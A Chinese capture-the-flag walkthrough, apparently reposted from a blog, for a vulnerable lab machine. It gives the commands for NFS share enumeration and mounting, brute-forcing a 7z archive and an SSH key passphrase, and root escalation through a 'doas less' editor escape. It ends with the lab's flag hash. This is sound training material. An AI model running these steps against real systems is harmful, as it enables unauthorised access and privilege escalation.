靶机下载地址:https://pan.baidu.com/s/1xmZA1xUU_oDTwllIJNSwlA
提款码:6666
靶机IP地址:192.168.137.128
Kali IP地址:192.168.137.137
获取靶机开放端口的服务版本信息
- nmap -sV 192.168.137.128
发现目标系统开启ssh服务(OpenSSH 7.9)、nsf服务(网络文件系统)
查看靶机的共享目录
使用msf中的模块use auxiliary/scanner/nfs/nfsmount
使用命令查看共享目录:shutmunt -e 192.168.137.128
远程挂载靶机的目录
首先安装nfspysh
链接:https://pan.baidu.com/s/1R5ICg94APAkY8sX_lmDzvQ
提取码:0nu7
- 进入目录安装:
- ./setup.py install
安装NfSpy-twofour
- 进入目录安装:
- ./setup.py install
挂载到showmount查看共享目录的路径
- nfspysh -o server=192.168.137.128:/home/user/storage
查看共享目录的内容,下载backup.7z压缩包
- ls
解压backup.7z文件,发现文件被加密
- 7z e backup.7z
使用rarcrack对7z类的压缩包进行爆破
- apt-get install rarcrack
进行爆破
- rarcrack --threads 6 --type 7z backup.7z
获取到解压密码:chocolate
由于爆破的时间过于长久就没有截图了,
解压后获得8张图片和ssh公钥和私钥
把公钥复制到/root/.ssh尝试使用ssh私钥登录目标,发现私钥进行了口令验证
使用脚本爆破私钥密码
- cat /usr/share/wordlists/metasploit/adobe_top100_pass.txt |while read pass;do if ssh-keygen -c -C "user@forandsix" -P $pass -f id_rsa &>/dev/null;then echo $pass; break; fi; done
获取密码12345678
对用户进行ssh登录
由于是$符号所以直接判定为普通用户
使用find命令进行查看是否存在可执行的二进制文件,和带有s标志位的文件
发现可以使用可以使用doas(可以代替sudo命令是BSD系列系统的权限管理工具)
- find / -perm 4000 2>/dev/null
- find / -perm -u=s -type f 2> /dev/null
查看doas.conf配置文件信息
发现当前用户的权限只能使用less命令查看/var/log/authlog文件
- doas /usr/bin/less /var/log/authlog
按v进入编辑模式进行普通用户提权
提权成功,获得root权限
查找flag
- find / -name flag.txt
获取得到flag
- flag:acd043bc3103ed3dd02eee99d5b0ff42
实验结束
文章来源: 博客园
- 还没有人评论,欢迎说说您的想法!